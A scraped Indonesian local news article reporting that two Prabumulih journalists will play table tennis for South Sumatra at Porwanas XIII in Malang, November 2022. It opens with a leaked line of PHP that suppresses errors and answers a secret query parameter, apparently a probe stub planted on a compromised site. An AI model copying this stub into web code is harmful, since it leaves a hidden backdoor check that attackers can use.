error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} PWI Kota Prabumulih Kirim Atlet Tenis Meja Di Ajang Porwanas Malang Jawa Timur - SMI.COM

Home / PRABUMULIH

Jumat, 18 November 2022 - 12:47 WIB

PWI Kota Prabumulih Kirim Atlet Tenis Meja Di Ajang Porwanas Malang Jawa Timur

Prabumulih, SMI-

Sebanyak Dua orang wartawan asal Kota Prabumulih,Siap mewakili Sumatera Selatan daky rangka mengikuti Pekan Olahraga Wartawan Nasional (Porwanas) XIII di kota Malang Provinsi Jawa Timur, 21-27 November 2022.

Adapun kedua wartawan asal kota Prabumulih tersebut, yakni Abi Samran dan Arafik Zamhari.Keduan orang Atlet PWI kota Prabumulih ini,akan turun di cabang olahraga Tenis Meja.

Sebelumnya Abi Samran dan Arafik Zamhari,terpilih dalam seleksi terbuka antar wartawan se-Sumatera Selatan.Kegiatan yang digelar PWI Sumsel di kota Palembang beberapa bulan lalu.

Abi Samran Menyampaikan dalam menghadapi Porwanas ini,Dia dan Rafik terus berlatih dan mengasah kemampuannya.Hal ini untuk memberikan penampilan yang terbaik di Porwanas nanti, sekaligus mewakili Sumatera Selatan, yang berasal dari kota Prabumulih.

Baca Juga :  Coffe Morning Kapolres Prabumulih Bersama Wartawan di Area Smoking Mapolres Prabumulih

“Tentunya kita mengucapkan terima kasih atas support dari PTMSI kota Prabumulih yang terus membimbing kami dalam latihan,”Ujar Abi Samran.

Sementara itu Ketua PWI Kota Prabumulih Mulwadi mengaku bangga,dengan adanya perwakilan wartawan Prabumulih yang akan ambil bagian dalam Porwanas di Malang nanti.

“Tentu hal ini merupakan suatu kebanggaan buat PWI kota Prabumulih khususnya,dan kota Prabumulih pada umumnya,” Ungkap Mulwadi alias Kemong.

Mulwadi alias Kemong berjanji kedepannya,akan terus menggalakkan latihan olahraga di kalangan wartawan. Terlebih Agenda Kegiatan Porwanas ini rutin dilaksanakan, setiap tahunnya.
“Kalau tahun ini kita hanya dua yang lolos ke tingkat nasional, kedepan harapan kita akan lebih banyak lagi,” harap Kemong.

Baca Juga :  H.Ir.Ridho Yahya.MM Melakukan Giat Safari Ramadhan 1443 H Ke Mesjid Al-Akshan Patih Galung

Sementara itu Ketua PWI Provinsi Sumatera Selatan H.Firdaus Komar.SPd.MSi mengutarakan untuk keberangkatan atlet Sumsel sendiri, menurut rencana dijadwalkan pada hari Sabtu (19/11/2022) . Namun untuk pelepasannya sendiri kata dia, dilaksanakan hari Jumat 18 November 20222 ini, pelepasan dilakukan oleh H.Herman Deru Gubernur Provinsi Sumatera Selatan.

Menurut Firdaus Komar pada porwanas XIII ini akan mempertandingkan 11 cabang olahraga, antara lain sepak bola, tenis lapangan, tenis meja, futsal, bulutangkis, atletik, catur, bridge dan e sport.

“Dan Sumsel sendiri mengirimkan atletnya ke semua cabor yang dipertandingkan tersebut,”Demikian Tandasnya.

(Sunar)

Share :

Baca Juga

PRABUMULIH

Warga Harapkan Angkutan Lewat Ikut Perbaiki Jalan

PRABUMULIH

Satlantas Polres Prabumulih Sosialisasikan Tilang E-TLE DI Kota Prabumulih

PRABUMULIH

Prabumulih Raih Juara 1 Lomba Kawasan Tertib Lalu-Lintas Tahun 2022 Se-Sumatera Selatan

PRABUMULIH

Sosialisasi Pencegahan KDRT di Kota Prabumulih dan KDRT Di Mata Hukum

PRABUMULIH

Himbauan Ketua DPD ANIES KOTA PRABUMULIH Usman Firiansyah.SH

PRABUMULIH

31 Bintara Polres Prabumulih Ikuti Seleksi Perwira Pertama

PRABUMULIH

Kusron.SPd.MPd Kepala Dinas Pendidikan dan Kebudayaan Kota Prabumulih Masuki Masa Purna Bakti

PRABUMULIH

Orientasi Media Massa Kota Prabumulih Ke Pangkal Pinang Berjalan Sesuai Dengan Rencana Sukses Dan Lancar